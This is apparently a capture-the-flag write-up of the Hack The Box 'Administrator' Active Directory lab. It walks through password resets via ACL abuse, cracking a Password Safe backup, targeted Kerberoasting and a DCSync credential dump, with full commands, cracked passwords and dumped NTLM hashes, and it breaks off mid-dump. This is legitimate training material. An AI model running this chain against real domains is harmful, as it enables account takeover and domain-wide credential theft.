https://www.hackthebox.com/machines/Administrator

Reconnaissance

Given Credentials

As it is common in real life windows pentests, we’re given a set of credentials to start:

Terminal window
Olivia / ichliebedich

nmap/TCP

Nmap showed a bunch of open ports which are typical for a Domain Controller(DC).

Terminal window
croc@hacker$ rustscan -a 10.10.11.42 --ulimit 5000 -- -A -T5 -Pn -oA Initial
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.42:21
Open 10.10.11.42:53
Open 10.10.11.42:88
Open 10.10.11.42:135
Open 10.10.11.42:139
Open 10.10.11.42:389
Open 10.10.11.42:445
Open 10.10.11.42:464
Open 10.10.11.42:593
Open 10.10.11.42:636
Open 10.10.11.42:5985
Open 10.10.11.42:9389
Open 10.10.11.42:49664
Open 10.10.11.42:49665
Open 10.10.11.42:49666
Open 10.10.11.42:49667
Open 10.10.11.42:49669
Open 10.10.11.42:53517
Open 10.10.11.42:53528
Open 10.10.11.42:53903
Open 10.10.11.42:53908
Open 10.10.11.42:53909
[~] Starting Nmap
[>] The Nmap command to be run is nmap -A -T5 -Pn -oA Initial -vvv -p 21,53,88,135,139,389,445,464,593,636,9389,49664,49665,49666,49667,49669,53517,53528,53903,53908,53909 10.10.11.42


Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-21 11:34 EST
Nmap scan report for 10.10.11.42
Host is up, received user-set (0.25s latency).
Scanned at 2025-01-21 11:34:39 EST for 91s


PORT      STATE SERVICE       REASON          VERSION
21/tcp    open  ftp           syn-ack ttl 127 Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-01-21 23:34:46Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
53517/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
53528/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
53903/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
53908/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
53909/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Timing level 5 (Insane) used
Aggressive OS guesses: Microsoft Windows 10 1703 or Windows 11 21H2 (97%), Microsoft Windows Server 2022 (96%), Windows Server 2019 (95%), Microsoft Windows Server 2012 or 2012 R2 (94%), Microsoft Windows 10 1703 (93%), Windows Server 2022 (93%), Microsoft Windows Server 2016 or Server 2019 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2016 (93%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.95%E=4%D=1/21%OT=21%CT=%CU=30024%PV=Y%DS=2%DC=T%G=N%TM=678FCCFA%P=x86_64-pc-linux-gnu)
SEQ(SP=103%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS=S%TS=A)
SEQ(SP=108%GCD=1%ISR=10C%TI=I%CI=I%TS=A)
OPS(O1=M53CNW8ST11%O2=M53CNW8ST11%O3=M53CNW8NNT11%O4=M53CNW8ST11%O5=M53CNW8ST11%O6=M53CST11)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC)
ECN(R=Y%DF=Y%T=80%W=FFFF%O=M53CNW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)
T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)
T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=80%CD=Z)


Uptime guess: 0.274 days (since Tue Jan 21 05:02:05 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows


Host script results:
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 35406/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 20522/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 52617/udp): CLEAN (Failed to receive data)
|   Check 4 (port 52572/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 6h59m59s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-01-21T23:35:55
|_  start_date: N/A


TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   281.14 ms 10.10.14.1
2   301.15 ms 10.10.11.42


Nmap done: 1 IP address (1 host up) scanned in 93.79 seconds
           Raw packets sent: 85 (6.902KB) | Rcvd: 92 (6.282KB)

We can see the hostname of DC in the output so let’s add it into the hosts file:

Terminal window
croc@hacker:~$ sudo sed -i '$a10.10.11.42tDC.administrator.htb administrator.htb' /etc/hosts

Ldapdomaindump - 389/tcp

I started by looking at our environment and evaluating the attack surface:

Terminal window
croc@hacker$ sudo /usr/bin/ldapdomaindump ldap://10.10.11.42 -u 'ADMINISTRATOROlivia' -p 'ichliebedich'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished


croc@hacker$ ls
domain_computers_by_os.html  domain_groups.grep  domain_policy.html  domain_trusts.json          domain_users.json
domain_computers.grep        domain_groups.html  domain_policy.json  domain_users_by_group.html
domain_computers.html        domain_groups.json  domain_trusts.grep  domain_users.grep
domain_computers.json        domain_policy.grep  domain_trusts.html  domain_users.html


croc@hacker$ firefox domain_users_by_group.html

This gave me a clear understanding of all the users and groups on the target. I have the habit of creating a users.txt file that comes very handy afterwards when password spraying.

ldapdomaindump Domain Users table for ADMINISTRATOR.HTB listing emma, alexander, ethan, emily, benjamin, michael, olivia and krbtgt with account flags

I found out that olivia, who we currently own, is the part of Remote Management Users.

ldapdomaindump Remote Management Users for ADMINISTRATOR.HTB listing emily, michael and olivia (olivia highlighted)

As port 5985/tcp is open, we can get evil-winrm shell access as olivia & see what we can do from there.

Evil-WinRM

I got the WinRM access but didn’t find anything juicy here!

Terminal window
croc@hacker$ sudo evil-winrm -i 10.10.11.42 -u olivia -p ichliebedich


Evil-WinRM shell v3.7


Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine


Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion


Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:UsersoliviaDocuments>

Time to move on to other options!

SMB - 139/445

I enumerated the available shares using the given credentials. The credentials are valid however, we are certainly not going to have access to the privileged shares like Admin$ or C$ as a low-level user.

Terminal window
croc@hacker$ sudo nxc smb 10.10.11.42 -u 'Olivia' -p 'ichliebedich' --shares
SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.42     445    DC               [+] administrator.htbOlivia:ichliebedich
SMB         10.10.11.42     445    DC               [*] Enumerated shares
SMB         10.10.11.42     445    DC               Share           Permissions     Remark
SMB         10.10.11.42     445    DC               -----           -----------     ------
SMB         10.10.11.42     445    DC               ADMIN$                          Remote Admin
SMB         10.10.11.42     445    DC               C$                              Default share
SMB         10.10.11.42     445    DC               IPC$            READ            Remote IPC
SMB         10.10.11.42     445    DC               NETLOGON        READ            Logon server share
SMB         10.10.11.42     445    DC               SYSVOL          READ            Logon server share

FTP - 21/tcp

The credentials Olivia:ichliebedich doesn’t appear to be valid for the FTP Service:

Terminal: FTP login to dc.administrator.htb as olivia fails with 530 "User cannot log in, home directory inaccessible"

Anonymous access is also not permitted:

Terminal: anonymous FTP login to dc.administrator.htb fails with 530 “User cannot log in”

BloodHound - 389/tcp

I dumped the .json configuration files using Python BloodHound Ingestor & uploaded the data in bloodhound.

Terminal window
croc@hacker$ sudo ntpdate dc.administrator.htb


croc@hacker$ bloodhound-python -c All -u 'olivia' -p 'ichliebedich' -d 'administrator.htb' -ns 10.10.11.42
INFO: Found AD domain: administrator.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.administrator.htb
INFO: Done in 00M 52S


croc@hacker$ ls
20250121123032_computers.json   20250121123032_domains.json  20250121123032_groups.json  20250121123032_users.json
20250121123032_containers.json  20250121123032_gpos.json     20250121123032_ous.jsons

I marked olivia as owned & found out that it has GenericAll permissions over michael. That means full control! This privilege allows the trustee to manipulate the target object however they wish.

BloodHound Node Info for OLIVIA@ADMINISTRATOR.HTB: one First Degree Object Control, a GenericAll edge to MICHAEL@ADMINISTRATOR.HTB

Shell as Michael

Changing the Password of Michael

As olivia has full control over michael, she must be able to change his password. I used bloodyAD to do that:

Terminal window
croc@hacker$ bloodyAD -u 'olivia' -p 'ichliebedich' -d 'Administrator.htb' --host '10.10.11.42' set password 'Michael' 'Pass@1234'
[+] Password changed successfully!

WinRM Access

As michael is a remote management user, we can gain a evil-winrm shell as michael:

Terminal window
croc@hacker$ sudo evil-winrm -i 10.10.11.42 -u 'michael' -p 'Pass@1234'


Evil-WinRM shell v3.7


Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine


Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion


Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:UsersmichaelDocuments>

However, I didn’t find anything useful here! Let’s move on!

Shell as Emily

Reviewing BloodHound Graphs

As we own a new user, it’s always a good practice to look back at the bloodhound graphs.

BloodHound graph: MICHAEL@ADMINISTRATOR.HTB has ForceChangePassword over BENJAMIN@ADMINISTRATOR.HTB

The user michael has the capability to change the user benjamin's password without knowing that his current password.

Changing the Password for Benjamin

I successfully changed the password for benjamin to supportmeonPatreon:

Terminal window
croc@hacker:~$ bloodyAD -u 'michael' -p 'Pass@1234' -d 'Administrator.htb' --host '10.10.11.42' set password 'Benjamin' 'supportmeonPatreon'
[+] Password changed successfully!

We own another user. Hurrah😁!!

Share Enumeration

BloodHound

Looking at the bloodhound graphs, I found out that benjamin is a part of Share Moderators group.

BloodHound graph: BENJAMIN@ADMINISTRATOR.HTB is a member of Share Moderators and another group on ADMINISTRATOR.HTB

Through enumeration on Google, I found out that:

The members of this group possess explicit permissions to access shared resources like SMB or FTP shares.

SMB

The password change was successful but we don’t have any additional access via SMB:

Terminal window
croc@hacker$ nxc smb 10.10.11.42 -u 'benjamin' -p 'supportmeonPatreon' --shares
SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.42     445    DC               [+] administrator.htbbenjamin:supportmeonPatreon
SMB         10.10.11.42     445    DC               [*] Enumerated shares
SMB         10.10.11.42     445    DC               Share           Permissions     Remark
SMB         10.10.11.42     445    DC               -----           -----------     ------
SMB         10.10.11.42     445    DC               ADMIN$                          Remote Admin
SMB         10.10.11.42     445    DC               C$                              Default share
SMB         10.10.11.42     445    DC               IPC$            READ            Remote IPC
SMB         10.10.11.42     445    DC               NETLOGON        READ            Logon server share
SMB         10.10.11.42     445    DC               SYSVOL          READ            Logon server share

FTP

I successfully logged in as benjamin using our new password. Additionally, I found a backup file.

Terminal window
croc@hacker$ ftp benjamin@DC.administrator.htb
Connected to DC.administrator.htb.
220 Microsoft FTP Service
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||64177|)
125 Data connection already open; Transfer starting.
10-05-24  08:13AM                  952 Backup.psafe3
226 Transfer complete.
ftp>

I transferred it to my machine.

Terminal window
ftp> prompt off
Interactive mode off.
ftp> mget *
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||64184|)
125 Data connection already open; Transfer starting.
100% |*****************************************************************************************|   952        3.86 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:00 (3.84 KiB/s)
ftp>

Backup File

Backup.psafe3

This file is a Password Safe database file which is a popular open-source password manager. Through enumeration, I found out that these type of files are protected by a master password.

Terminal window
croc@hacker$ file Backup.psafe3
Backup.psafe3: Password Safe V3 database

Cracking the Master Password

In order to view the passwords stored in this database file, we need its master password. Luckily, there is a JTR utility called pwsafe2john which we can utilize to convert this database file into crackable hashes allowing us to attempt password cracking using john.

Terminal window
croc@hacker$ pwsafe2john Backup.psafe3 > backup.hashes


croc@hacker$ ls
backup.hashes  Backup.psafe3


croc@hacker$ john backup.hashes --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 128/128 AVX 4x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tekieromucho     (Backu)
1g 0:00:00:02 DONE (2025-01-21 15:23) 0.4975g/s 3056p/s 3056c/s 3056C/s Liverpool..iheartyou
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Hurrah!! The master password has been successfully cracked!

Install Password Safe Password Manager

Install PasswordSafe using the following command:

Terminal window
croc@hacker$ sudo apt update -y && sudo apt install passwordsafe -y

After installed, you can access it via CLI using the command pwsafe or run it manually through Applications.

View the Database File

  1. Once installed, open it & you will see the following dialog box:
Terminal window
croc@hacker$ pwsafe Backup.psafe3&
[1] 198610

Password Safe v1.20 Master Password Entry dialog for the Backup.psafe3 database, password field empty

  1. Enter the master password we just cracked. Then, hit OK.

Password Safe v1.20 Master Password Entry for Backup.psafe3 with the master password tekieromucho entered

  1. Here, we found the passwords for 3 other accounts:

Password Safe Backup.psafe3 opened, listing entries for Alexander Smith [alexander], Emily Rodriguez [emily] and Emma Johnson [emma]

  1. Copy and paste all these passwords into mousepad or gedit for later use.

notes.txt in a text editor listing recovered credentials for olivia, alexander, emily and emma

WinRM Access

As emily is a remote management user,

Terminal window
croc@hacker$ sudo evil-winrm -i 10.10.11.42 -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'


Evil-WinRM shell v3.7


Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine


Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion


Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:UsersemilyDocuments>

user.txt

Terminal window
*Evil-WinRM* PS C:Usersemilydesktop> ls


    Directory: C:Usersemilydesktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        10/30/2024   2:23 PM           2308 Microsoft Edge.lnk
-ar---         1/21/2025   8:11 PM             34 user.txt


*Evil-WinRM* PS C:Usersemilydesktop> cat user.txt
4a86a2************************

Shell as Root

BloodHound

As we have compromised a bunch of other users, we must return to the bloodhound graphs and see what we can do. I found out that emily has GenericWrite permissions over ethan:

BloodHound graph: ETHAN@ADMINISTRATOR.HTB has GenericWrite over EMILY@ADMINISTRATOR.HTB

Targeted Kerberoasting

As an attacker, what we do is add a SPN to the target account. Once an account has a SPN, it becomes vulnerable to kerberoasting attack. You can read more about it here.

We will be using the following script in order to perform this attack:

github.com favicon
GitHub - ShutdownRepo/targetedKerberoast: Kerberoast with ACL abuse capabilities
Kerberoast with ACL abuse capabilities. Contribute to ShutdownRepo/targetedKerberoast development by creating an account on GitHub.
github.com

Step 01 - Dump the Hash

The hash has been successfully dumped by script:

Terminal window
croc@hacker:/opt/targetedKerberoast$ python3 targetedKerberoast.py -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' --dc-ip '10.10.11.42'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$fff79301f8fe782e17c7fb5d857e5c24$03bec9263f5408d18be2724fa3f6db1562aba7aa9cd2b3ae867714121b84c9739845788db09052ee101765ed0959f2e1dcebcad602f881ffa7e2a6b14883fa1d5c46b859aaee9c3fe568ced9afa0681413b7f310fc6a6cc6bad1d39a55a4c9cb311acbdb7599d4ccf69f8ad923b67d3c0ad9bf0548a3d053ab4cfe03c8feb4ad23a8bea60f0906f60330d55cb4f7c419bb4f9670aa91c9b041e9cc1ae75acb37241f5b9375a30e10b592131e463d3dacb1c6d1c2136699b88ebdca53814cce6d34695ea97f6a0323757494b17ed43690ac96cfef7d3d1b19fb03a4ff6096dbf698d19f9f712c5fcf062021580cbd6e153803bde9bacce0b6e3854f8443af063c48c28043064db82d5d3e9e144d3e84e4cd597c5395c5daaa37aef4979a9eb70a75759d3d7e33eb7dfe7ac3ce7dd3da88954ef3c04dba2a2136e70d76a725164b17f1a19acc39db8b8a15b37794ca97924b38fdd839229efd6109becb8084199ab07714d0f108ea003848169ad6aa5be2dcd34fd054a984bbbe040d36a6fa7a270159ded958a2a2cbccb23343ccfd1f61c43a26af21f40e6693fea688d409afe3e27e279c8c5df1a45a9f213db9508fa91763fc0f68f16982addddc86b2963328545358f43795fed9ecf30efae91d1877e1ef6f551c1a8febde68e976d7d72d36d5a504695eafded2fb885a0541af60f61cd25ac9b83257e94758227b2db1ebe9b9ce8a303535632c8c9f7e3cfa76fdeed33d3f57cd7f6db1c94c3f3a06a256939fec217abe561093b1b48d4b23e8336406dda34903c567316a8d0851376b631b411fa7cd96c07e2979d8ac89b8fc23eff76c0cda93197cc93b35cdebc6cc63a9fc0aa10246f77f988fa75e1644ab78d05a3e95dea386e1b07d2ba901f55dd972cf8546871571fa35b20d9f4bc10ad3798e000f4bdef49ee3b848821e6a769768e8b11cc4ab910d8767b29e5c046561a7abe5e2576c772f30c7d4e70e4e21b982b4429fc5239ea841f2dcdf560b21d5e72f0cf4190c8bafc099723c431a5c40e1d5a9df1bce11fdd05158a0821d2cefb9b240b94f0e99e0466b1e4cfefa64aa081bca49d2f036e36d785ec18310812fbbe574d0663aa243e1a2d58b885e3321defc23684a294c6ae56097914dfaec9f799d37fa331afff32dc14bdcb69327a926be2638668124032bb930a4f3ed3d2636b8a23b7f6a2c38bfd714436ccf63ae61fd854b4ca56d19a0249289b99354265c6316163a3a13cdf9520840ae4869de9b563656ee10fdf95a2cead9d284f54c7f8bfb04bbbc3fdf082f9743f7abda03f1be6b3a8818d405fa00c159d7e897830bb316b3b1a36cff6812c4fdc753049531b34731ea9f5362138f76e8b351241c279dac5d9da6cdeba6e1daf3ec4cf5ca572e293a30020eba7133ad5365888d7edd0f6eb588bbd22a62758e58b9463689e87e599ed64739a5dea443ad527dd6440acc508f0cdc28d5ac7e3bf4628d262f798d8e00950e9f81853855a1f2005bbe2a6a15adfa6b173b1f3fc592455418a6
[VERBOSE] SPN removed successfully for (ethan)

Step 02 - Crack the Hash

Hashcat successfully cracked the hash:

Terminal window
croc@hacker$ hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting


$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$fff79301f8fe782e17c7fb5d857e5c24$03bec9263f5408d18be2724fa3f6db1562aba7aa9cd2b3ae867714121b84c9739845788db09052ee101765ed0959f2e1dcebcad602f881ffa7e2a6b14883fa1d5c46b859aaee9c3fe568ced9afa0681413b7f310fc6a6cc6bad1d39a55a4c9cb311acbdb7599d4ccf69f8ad923b67d3c0ad9bf0548a3d053ab4cfe03c8feb4ad23a8bea60f0906f60330d55cb4f7c419bb4f9670aa91c9b041e9cc1ae75acb37241f5b9375a30e10b592131e463d3dacb1c6d1c2136699b88ebdca53814cce6d34695ea97f6a0323757494b17ed43690ac96cfef7d3d1b19fb03a4ff6096dbf698d19f9f712c5fcf062021580cbd6e153803bde9bacce0b6e3854f8443af063c48c28043064db82d5d3e9e144d3e84e4cd597c5395c5daaa37aef4979a9eb70a75759d3d7e33eb7dfe7ac3ce7dd3da88954ef3c04dba2a2136e70d76a725164b17f1a19acc39db8b8a15b37794ca97924b38fdd839229efd6109becb8084199ab07714d0f108ea003848169ad6aa5be2dcd34fd054a984bbbe040d36a6fa7a270159ded958a2a2cbccb23343ccfd1f61c43a26af21f40e6693fea688d409afe3e27e279c8c5df1a45a9f213db9508fa91763fc0f68f16982addddc86b2963328545358f43795fed9ecf30efae91d1877e1ef6f551c1a8febde68e976d7d72d36d5a504695eafded2fb885a0541af60f61cd25ac9b83257e94758227b2db1ebe9b9ce8a303535632c8c9f7e3cfa76fdeed33d3f57cd7f6db1c94c3f3a06a256939fec217abe561093b1b48d4b23e8336406dda34903c567316a8d0851376b631b411fa7cd96c07e2979d8ac89b8fc23eff76c0cda93197cc93b35cdebc6cc63a9fc0aa10246f77f988fa75e1644ab78d05a3e95dea386e1b07d2ba901f55dd972cf8546871571fa35b20d9f4bc10ad3798e000f4bdef49ee3b848821e6a769768e8b11cc4ab910d8767b29e5c046561a7abe5e2576c772f30c7d4e70e4e21b982b4429fc5239ea841f2dcdf560b21d5e72f0cf4190c8bafc099723c431a5c40e1d5a9df1bce11fdd05158a0821d2cefb9b240b94f0e99e0466b1e4cfefa64aa081bca49d2f036e36d785ec18310812fbbe574d0663aa243e1a2d58b885e3321defc23684a294c6ae56097914dfaec9f799d37fa331afff32dc14bdcb69327a926be2638668124032bb930a4f3ed3d2636b8a23b7f6a2c38bfd714436ccf63ae61fd854b4ca56d19a0249289b99354265c6316163a3a13cdf9520840ae4869de9b563656ee10fdf95a2cead9d284f54c7f8bfb04bbbc3fdf082f9743f7abda03f1be6b3a8818d405fa00c159d7e897830bb316b3b1a36cff6812c4fdc753049531b34731ea9f5362138f76e8b351241c279dac5d9da6cdeba6e1daf3ec4cf5ca572e293a30020eba7133ad5365888d7edd0f6eb588bbd22a62758e58b9463689e87e599ed64739a5dea443ad527dd6440acc508f0cdc28d5ac7e3bf4628d262f798d8e00950e9f81853855a1f2005bbe2a6a15adfa6b173b1f3fc592455418a6:limpbizkit


Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator....5418a6
Time.Started.....: Tue Jan 21 23:42:31 2025 (0 secs)
Time.Estimated...: Tue Jan 21 23:42:31 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    76395 H/s (4.12ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 5376/14344385 (0.04%)
Rejected.........: 0/5376 (0.00%)
Restore.Point....: 4608/14344385 (0.03%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Liverpool -> ginuwine
Hardware.Mon.#1..: Util: 40%


Started: Tue Jan 21 23:41:00 2025
Stopped: Tue Jan 21 23:42:33 2025

So, the password for ethan is limpbizkit. Congratulations, we owned another user!

Revisiting BloodHound

The user ethan has the following privileges on the domai:

  • DS-Replication-Get-Changes
  • DS-Replication-Get-Changes-In-Filtered-Set
  • DS-Replication-Get-Changes-All

These privileges allows ethan to perform a DCSync attack.

BloodHound graph: ETHAN@ADMINISTRATOR.HTB has DCSync rights (GetChanges, GetChangesInFilteredSet, GetChangesAll) over the ADMINISTRATOR.HTB domain

DCSync Attack

In this attack, an attacker simulates the behavior of a domain controller and retrieve password data or NTDS.dit via Domain Replication. Watch this video or read this for a better understanding.

I used secretsdump to perform the DCSync attack and dumped the NTDS.dit:

Terminal window
croc@hacker$ impacket-secretsdump administrator.htb/'ethan':'limpbizkit'@10.10.11.42
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies


[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domainuid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htbolivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htbmichael:1109:aad3b435b51404eeaad3b435b51404ee:8864a202387fccd97844b924072e1467:::
administrator.htbbenjamin:1110:aad3b435b51404eeaad3b435b51404ee:95687598bfb05cd32eaa2831e0ae6850:::
administrator.htbemily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htbethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htbalexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htbemma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htbolivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htbolivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htbolivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htbmichael:aes256-cts-hmac-sha1-96:b360c36cb6777b8cc3d88ab1aa60f0064e6ea4fc9b9a4ebacf66345118c0e959
administrator.htbmichael:aes128-cts-hmac-sha1-96:bc3c8269d1a4a82dc55563519f16de8b
administrator.htbmichael:des-cbc-md5:43c2bc231598012a
administrator.htbbenjamin:aes256-cts-hmac-sha1-96:a0bbafbc6a28ed32269e6a2cc2a0ccb35ac3d7314633815768f0518ebae6847f
administrator.htbbenjamin:aes128-cts-hmac-sha1-96:426ca56d39fe628d47066fc3448b645e
administrator.htbbenjamin:des-cbc-md5:b6f84a864376a4ad
administrator.htbemily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htbemily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htbemily:des-cbc-md5:804343fb6e0dbc51
administrator.htbethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htbethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htbethan:des-cbc-md5:58387aef9d6754fb
administrator.htbalexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htbalexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
